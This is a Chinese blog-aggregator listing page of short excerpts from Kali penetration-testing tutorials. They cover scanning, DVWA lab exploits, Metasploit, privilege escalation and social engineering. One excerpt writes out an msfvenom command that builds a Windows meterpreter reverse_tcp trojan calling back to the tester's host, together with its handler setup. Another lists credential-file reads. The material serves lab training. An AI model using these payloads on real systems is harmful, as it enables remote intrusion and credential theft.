kali渗透测试

Kali渗透测试之服务扫描3——防火墙识别、负载均衡识别、WAF识别

一、防火墙识别公司网络的边界一般都会有防火墙进行保护,防火墙上会有一些检测机制,我们的目的是尽量隐蔽地扫描出防火墙的规则,以及开放端口。扫描原理:通过发送数据包,检查回包,可能识别端口是否经过防火墙过滤。设备多种多样,结果存在一定误差。可根据下面四种方法来判断防火墙的过滤规则:1、使用python脚本进行防火墙识别——fw_detect.py#!/usr/bin/python#该脚本用于实现判断防
浅浅爱默默·2023-11-30 09:41

kali渗透测试之三操作系统识别

识别操作系统:在确定目标主机在线后,应当识别他们使用的操作系统,这个阶段的工作称为识别操作系统(也称为操作系统指纹识别),识别操作系统的的方式分为两种:主动式和被动式。主动式识别工具向目标机器发送数据包,并根据目标的响应确定其使用的操作系统,这种方式的优点在于探测速度快,缺点是目标主机可能会发现我们探测操作系统的行为。被动式操作系统识别方法克服了主动式识别方法的缺点,缺点是比主动式识别速度慢。(例
服务猿·2023-04-13 09:10

Kali渗透测试:使用Metasploit对Web应用的攻击

Kali渗透测试:使用Metasploit对Web应用的攻击Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。
不习惯有你·2023-04-07 01:01

kali渗透测试系列---信息收集

kali渗透测试系列文章目录kali渗透测试系列信息收集信息收集信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再到web应用开发的语言等等的种类多如繁星我们一个个的尝试
order by·2023-01-22 00:34

kali渗透测试到底该如何学?

1、渗透测试是什么?渗透测试,是为了证明网络防御按照预期计划正常运行而提供的一种机制。渗透测试是通过各种手段对目标进行一次渗透(攻击),通过渗透来测试目标的安全防护能力和安全防护意识。打个比方:比如电视剧《我是特种兵》里面的演习,特种部队(进攻方)渗透到蓝军(防守方)的指挥部进行斩首,如果斩首成功,那么就可以知道蓝方的防守能力不够好,需要改进,反之就是特种部队的特种作战能力不足,需要提升。那么渗透
不是程序媛ya·2023-01-10 13:16

Kali渗透测试:拒绝服务攻击

Kali渗透测试:拒绝服务攻击故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击。拒绝服务攻击是指攻击者想办法让目标停止提供服务,是黑客常用的攻击手段之一。
Bruce_Liuxiaowei·2022-06-01 20:20

Kali渗透测试:网络数据的嗅探与欺骗

Kali渗透测试:网络数据的嗅探与欺骗无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理。
Bruce_Liuxiaowei·2022-05-30 16:47

Kali渗透测试:散列密码破解

Kali渗透测试:散列密码破解某些网站的安全机制设置有缺陷,导致自身的关键数据库被渗透。
Bruce_Liuxiaowei·2022-05-27 10:25

Kali渗透测试之使用Metasploit对Web应用的攻击

目录实验环境实验步骤1.在Kali中启动并进入msf62.启动web_delivery模块3.设置木马类型、木马主控端IP地址和端口4.执行run5.在靶机DVWA中“CommandExecution”页面中注入命令6.在Kali中查看sessionWeb应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系
·2022-05-18 10:32

kali渗透测试:【实验2】一次简单的渗透测试实战

启动Kali容器并进入到bash界面里,执行ping操作验证网络联通性:#启动并进入Kali容器里的bashdockerrun-ti--networkhost3f457bash#在Kali容器中测试虚拟网络连接,使用Ctrl-C退出ping:pingtarget在Kali容器的bash界面里运行以下命令,注意Nmap的参数使用:-p:指定扫描的端口范围-T4:设定nmap扫描的时间策略,数字为0-
鹿北先森·2022-04-24 16:33

二层发现

title:二层发现date:2016-04-1010:45tags:kali渗透测试主动信息收集0x00琐碎从上一章节,我们可以收集到大量的被动信息,但是因被动而收集的信息,并不与目标系统进行直接交互
曼路x_x·2021-05-10 12:45

小白日记33:kali渗透测试之Web渗透-扫描工具-Burpsuite(一)

扫描工具-BurpsuiteBurpSuite是Web应用程序测试的最佳工具之一,成为web安全工具中的瑞士军刀。其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查。【属于重量级工具,每个安全从业人员必须会的】但不是开源软件,有其免费版版,但在free版没有主动扫描功能,可用于手动挖掘。【有其破解版,适合个人使用】所有的工
子轩非鱼·2020-09-10 12:38

小白日记13:kali渗透测试之服务扫描(三)-SMTB扫描、防火墙识别、负载均衡识别、WAF识别

SMTP扫描SMTP(SimpleMailTransferProtocol)即简单邮件传输协议,它是一组用于由源地址到目的地址传送邮件的规则,由它来控制信件的中转方式。SMTP协议属于TCP/IP协议簇,它帮助每台计算机在发送或中转信件时找到下一个目的地。通过SMTP协议所指定的服务器,就可以把E-mail寄到收信人的服务器上了,整个过程只要几分钟。SMTP服务器则是遵循SMTP协议的发送邮件服务
子轩非鱼·2020-08-20 22:10

Kali渗透测试技术实战》

这本书在亚马逊上评论8分左右,买回来看了有3次就看完了。事实证明,这本书只是一个渗透测试概念的普及书。收获最大的是Kali系统或者说是Linux系统的系统安装,以及一些工具的简介。渗透测试生命周期(步骤)1.侦察利用好Google搜索以及网络,利用nslookup。2.扫描(扫描出目标系统的信息,漏洞)利用Nmap,Nessus等工具。3.渗透(漏洞利用)利用Metasploit,Kali下命令行
夏夜星语·2020-08-20 08:17

Kali渗透测试——EtherApe

网络协议图形化分析工具EtherApe在对网络数据分析的时候,渗透测试人员往往只关心数据流向以及协议类型,而不关心具体数据包的内容。因为这样可以快速找到网络的关键节点或者重要的协议类型。KaliLinux提供的EtherApe可以满足这个需求。该工具需要用户使用命令apt-getinstalletherape手动安装。它支持导入数据包和实时抓包两种方式,来获取网络数据。根据获取的数据,它可以实时显
dif90304·2020-08-18 08:34

Kali渗透测试之提权2——WCE、fgdump、mimikatz

一、WINDOWS身份认证过程在登录窗口输入账号和密码后,winlogon.exe会将输入的密码进行lmhash和nthash加密;然后将加密后的密码与SAM账户数据库进行比对,如果比对匹配,则成功登录操作系统(本地登录);如果网络中的一台主机尝试远程登录另一台主机,登录的账号和密码也是通过本地计算机将输入的密码进行lmhash和nthash计算,然后将加密后的密文通过网络传输到目标主机;虽然输入
浅浅爱默默·2020-08-11 14:11

Kali渗透测试之提权1——本地提权

本地提权定义:我们已经登录到目标系统的计算机上,拿到目标系统的shell,在这个shell基础之上,进行提权。现在的操作系统都是多用户操作系统,一个操作系统可以设置多个用户账号,这些账号可以是用户账号,也可以是为某个应用程序专门设置的应用程序账号。这样做的目的是进行不同账号之间权限的隔离,因为所有的事情都由一个账号去做的话,必须赋予该账号最大的权限,一旦该账号密码失窃,对方就会直接控制我们的服务器
浅浅爱默默·2020-08-11 14:11

Kali渗透测试之DVWA系列6——CSRF(跨站请求伪造)

目录一、CSRF简介二、原理示意图三、实验环境四、实验步骤安全级别:Low(四种方法)安全级别:Medium安全级别:High安全级别:Impossible一、CSRF简介CSRF(Cross-siterequestforgery)跨站请求伪造,也被称为“OneClickAttack”或者SessionRiding,通常缩写为CSRF或者XSRF。它是利用受害者尚未失效的身份认证信息(cookie
浅浅爱默默·2020-08-10 04:47

小白日记9:kali渗透测试之主动信息收集(二)四层发现:TCP、UDP、nmap、hping、scapy

四层发现四层发现的目的是扫描出可能存活的IP地址,四层发现虽然涉及端口扫描,但是并不对端口的状态进行精确判断,其本质是利用四层协议的一些通信来识别主机ip是否存在。四层发现的优点:1、可路由且结果可靠;2、不太可能被防火墙过滤,甚至可以发现所有端口都被过滤的主机。[一些比较严格的防火墙还是会过滤掉]缺点:是基于状态过滤的防火墙可能过滤扫描;全端口(UDP+TCP十几万个端口)扫描的速度慢。一、TC
子轩非鱼·2020-08-05 00:27

kali渗透测试之一信息搜集

通用渗透测试框架◆范围界定:收集需求、筹划工作、边界分析、明确业务指标、项目管理和统筹调度◆信息收集:包括DNS服务器、路由关系、whois数据库、电子邮件地址、电话号码、个人信息以及用户账户⇨⇨信息收集可分为两大类:主动式信息收集和被动式信息收集。主动式信息收集方法是通过直接发起与该目标网络之间的互动来获取相关信息,例如ICMPping或者TCP端口扫描就属于主动式信息手机手段。而被动式信息收集
服务猿·2020-07-31 23:48

Kali渗透测试之DVWA系列(三)——SQL Injection(SQL注入)

目录:一、SQL注入简介:SQL注入漏洞原理SQL注入类型SQL注入过程二、实验环境三、实验步骤安全级别:LOW安全级别:Medium安全级别:High安全级别:Impossible一、SQL注入简介1、SQL注入漏洞原理:SQL注入漏洞原理:把SQL命令插入到Web表单提交,或输入域名,或网页提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。(即,将恶意的SQL语句拼接到合法的语句中,
weixin_45116657·2020-07-30 05:19

NMAP

title:NMAPdate:2016-06-1310:58tags:kali渗透测试主动信息收集0x00NMAP常用参数介绍0x01TARGETSPECIFICATION目标发现-iL添加扫描待ip列表文件
onejustone·2020-07-30 04:56

SNMP扫描

title:SNMP扫描date:2016-06-1009:56tags:kali渗透测试主动信息收集0x00SNMP扫描简单网络管理协议扫描,SNMP的客户端通常使用的是162端口,而服务器通常使用的是
onejustone·2020-07-15 16:03

Kali渗透测试之提权(四)——基本信息收集、敏感数据收集、隐藏痕迹

提权之后,需要收集目标系统的重要信息!!!一、基本信息收集(一)Linux表白四联:whoami(我是谁)——>pwd(我在哪)——>uname-a(你是谁)1.、cat/etc/resolv.conf#查看DNS的配置文件2、cat/etc/passwd#查看密码文件,所有用户都有权限;第1字段:用户名称第2字段:密码标志第3字段:UID(用户ID)0:超级用户1-499:系统用户(伪用户)50
weixin_45116657·2020-07-10 11:29

Kali渗透测试——被动信息收集之Recon-NG框架

一、Recon-NG简介Recon-ng是一个全面的web信息搜索框架,命令格式与msf一致它基于python开发,有着独立的模块、数据库交互功能、交互式帮助提示和命令补全的特性。它通过命令行工具调用搜索引擎,在搜索引擎中搜索基于web的相关信息,从而帮助测试人员快速彻底地进行探测。在命令提示符下输入命令Recon-NG,看到[recon-ng][default]>提示符,表示成功登录Recon-
浅浅爱默默·2020-07-10 10:39

小白日记18:kali渗透测试之缓冲区溢出实例(二)--Linux,穿越火线1.9.0

Linux系统下穿越火线-缓冲区溢出原理:crossfire1.9.0版本接受入站socket连接时存在缓冲区溢出漏洞。工具:调试工具:edb;###python在漏洞溢出方面的渗透测试和漏洞攻击中,具有很大的优势实验对象:crossfire【多人在线RPG游戏】运行平台:Kalii686虚拟机【32位,计算机CPU位数是指地址总线位数,64位系统的寻址空间为2^64,寻址过大,难以处理,为了简化
子轩非鱼·2020-07-04 09:24

Kali渗透测试(八)——DVWA文件包含/目录遍历漏洞利用 Directory traversal/File include

Kali渗透测试(八)——DVWA文件包含/目录遍历漏洞利用一.文件包含简介服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。
Bulldozer Coder·2020-07-01 08:35

Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)

目录:一、SQL盲注SQL盲注与SQL注入的区别;SQL盲注的过程;二、实验环境三、实验过程基于布尔值的盲注;基于时间的盲注;一、SQL盲注简介1、SQL盲注:盲注:SQLInjection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容;注入:可以查看详细的内容2、手工盲注思路:手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的很多,但是只会回答“是”或者“不是”,因此你需
weixin_45116657·2020-06-29 15:24

Kali渗透测试之DVWA系列5——存储型XSS(跨站脚本攻击)

cookie安全级别:Medium安全级别:High安全级别:Impossible存储型XSS长期存储于服务器端每次用户访问都会被执行javascript脚本了解XSS简介以及反射型XSS,请戳此超链接——Kali
浅浅爱默默·2020-06-29 09:22

Kali渗透测试之DVWA系列7——SQL Injection(SQL注入)

目录一、SQL注入1、SQL注入漏洞原理2、SQL注入类型3、SQL注入过程二、实验环境三、实验步骤安全级别:LOW安全等级:Medium安全级别:High安全级别:Impossible一、SQL注入1、SQL注入漏洞原理把SQL命令插入到Web表单提交、或输入域名、或页面提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。2、SQL注入类型字符型数字型搜索型3、SQL注入过程判断是否存在
浅浅爱默默·2020-06-29 09:51

Kali渗透测试之DVWA系列2——Brute Force(暴力破解)

目录一、暴力破解原理二、实验环境三、实验步骤安全等级:LOW安全等级:Medium暴力破解的四种方式安全等级:High安全等级:Impossible防止暴力破解的有效手段一、暴力破解原理暴力破解的原理就是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。因为理论上来说,只要字典足够庞大,枚举总是能够成功的!但实际发送的数据并不像想象中的那样简单——“每次只向服务器发送用户名和密码
浅浅爱默默·2020-06-29 09:50

Kali渗透测试之DVWA系列1——创建dvwa、安装Burp Suite

一、创建dvwa1、在WindowsServer2003(IP:192.168.247.129)安装phpstudy.exe,双击phpStudy.exe,默认路径安装,提供Apache、mysql等服务。2、解压DVWA-1.9.zip压缩包,并重命名dvwa3、启动phpstudy4、配置dvwa(将dvwa文件放到phpStudy的www目录下,使其可以被访问,访问链接:http://www
浅浅爱默默·2020-06-29 09:50

Kali渗透测试之DVWA系列3——命令执行漏洞

一、命令执行漏洞命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内就好比说一句话木马二、分类1、代码过滤不严或无过滤2、系统漏洞可以构造环境变量的值来执行具有攻击力的脚本代码,会影响到bash交互的多种应用,例如:http、ssh、dhcp等3、调用第三方组件,例如PHP—exec()、system()、popen()、passthru()、proc_open()、pcn
浅浅爱默默·2020-06-29 09:50

kali渗透测试win10

通过msfvenom生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost=自己地址lport=端口号-fexex>XX.exe把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接在kali中msfconsolemsf>useexploit/multi/handlermsfexploit(multi/handler)>setpayloadwi
舌耳·2020-06-28 20:26

Kali渗透测试之五社会工程学

◆社会工程学:如果目标网络没有直接的入口,欺骗的艺术将起到抛砖引玉的重要作用。对目标组织中的人员进行定向攻击,很有可能帮助我们找到渗透目标系统的入口。例如:诱使用户运行会安装后门的恶意程序。社会工程学渗透分为多种不同形式,伪装成网络管理员,通过电话要求用户提供给自己的账户信息,发送钓鱼邮件来劫持用户的银行账户,甚至是诱使某人出现在某个地点。▶社会工程学是利用人性弱点体察、获取有价值信息的实践方法,
服务猿·2020-06-25 22:58

防火墙识别

title:防火墙识别date:2016-06-1219:12tags:kali渗透测试主动信息收集防火墙:依照特定的规则,允许或是限制传输的数据通过。
onejustone·2020-06-22 19:07

Kali渗透测试(七)—— DVWA文件上传漏洞利用

Kalilinux渗透测试——文件上传一.简介上传的文件对应用程序构成了重大风险。许多攻击的第一步是向要攻击的系统获取一些代码。然后,攻击仅需要找到一种方法来执行代码。使用文件上传可帮助攻击者完成第一步。无限制文件上传的后果可能会有所不同,包括完整的系统接管,文件系统过载,将攻击转发到后端系统以及简单的破坏。这取决于应用程序如何处理上传的文件,包括文件的存储位置。主要利用方式1.直接上传websh
Bulldozer Coder·2020-06-21 17:43

Kali渗透测试(二)openvas安装与使用

Kali渗透测试(二)openvas安装OpenVAS是开放式漏洞评估系统,也可以说它是一个包含着相关工具的网络扫描器。
Bulldozer Coder·2020-06-21 17:43

Kali网络配置

title:Kali网络配置date:2016-07-3121:24tags:Kali渗透测试Kali安装与环境优化0x00Kali网络配置当在一个有DHCP服务器的网络环境中,kali会自动获取到IP
onejustone·2020-06-20 21:09

00 环境:配置渗透实验环境

安装部署Kali渗透测试机下载地址:https://www.kali.org/downloads/在测试机上安装Firefox的相关各类插件:TamperDataCookiesManager+FirebugHackbarHTTPRequesterPassiveRecon
半个王国·2020-03-26 12:33

解决kali升级空间不足问题

title:解决kali升级空间不足问题date:2016-02-2321:24tags:Kali渗透测试Kali安装与环境优化0x00原因分析如果/var是单独分区的,可能是分区容量过小,更新系统或者安装大型软件时
onejustone·2020-03-21 00:32

Kali 渗透测试 - 服务器攻击实战

实验楼最新推出训练营课程:【Kali渗透测试-服务器攻击实战】,将教会你如何入门攻下一台有漏洞的主机。Kali渗透测试-服务器攻击实战.png课程简介:这个课程是国内首个完全在
实验楼·2020-03-19 01:09

Kali 渗透测试 - Web 应用攻击实战

实验楼推出的【Kali渗透测试-Web应用攻击实战】课程将使用渗透测试技术教大家如何去攻击一家网站,并针对找出的跨站脚本XSS、SQL注入、文件包含等安全漏洞,都提供了如何避免的解决方案。
实验楼·2020-03-17 04:07

漏洞扫描基本概念

title:漏洞扫描基本概念date:2016-06-1510:30tags:Kali渗透测试漏洞扫描通过之前的扫描我们可以知道目标主机的一些基本信息,然后我们可以基于这些个基本信息去进一步的发现目标是否存在漏洞
onejustone·2020-03-14 07:13

SMTP扫描

title:SMTP扫描date:2016-06-1009:56tags:kali渗透测试主动信息收集0x00SMTPSMTP扫描最主要的作用是发现目标主机上的邮件账号。
onejustone·2020-03-14 03:43

Kali 渗透测试 - 后门技术实战

课程介绍:Kali的教程网上有很多,但缺少系统化的在线实验课程,所以我们策划制作了Kali渗透测试系列训练营,针对FTP,Tomcat,NFS,VNC,Samba,SSH服务的安全漏洞,使用Nmap及Metasplo
实验楼·2020-03-09 22:03

服务端扫描

title:服务端扫描date:2016-05-2915:50tags:kali渗透测试主动信息收集0x00碎语我们已经知道,仅仅通过之前的方式扫描出来的端口来看,是不能绝对的认定哪个端口对应的就是某个服务软件或者协议的端口
onejustone·2020-03-07 12:14

W3AF身份认证

title:W3AF身份认证date:2016-09-0511:16tags:Kali渗透测试Web渗透测试0x00W3AF简介无论是Httrack,Nikto,Vega还是skipfish都是比较轻量级的
onejustone·2020-02-10 18:04

Burpsuite

title:Burpsuitedate:2016-10-1720:50tags:Kali渗透测试Web渗透测试0x00Burpsuite简介Burpsuite享有Web安全工具中的瑞士军刀的美誉。
onejustone·2020-01-04 15:10

W3AF截断代理

title:W3AF截断代理date:2016-010-0711:55tags:Kali渗透测试Web渗透测试0x00截断代理通过w3af的截断代理功能,可以查看到完成的客户端与服务器的请求数据。
onejustone·2019-12-31 04:47
上一页 1 2 3 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他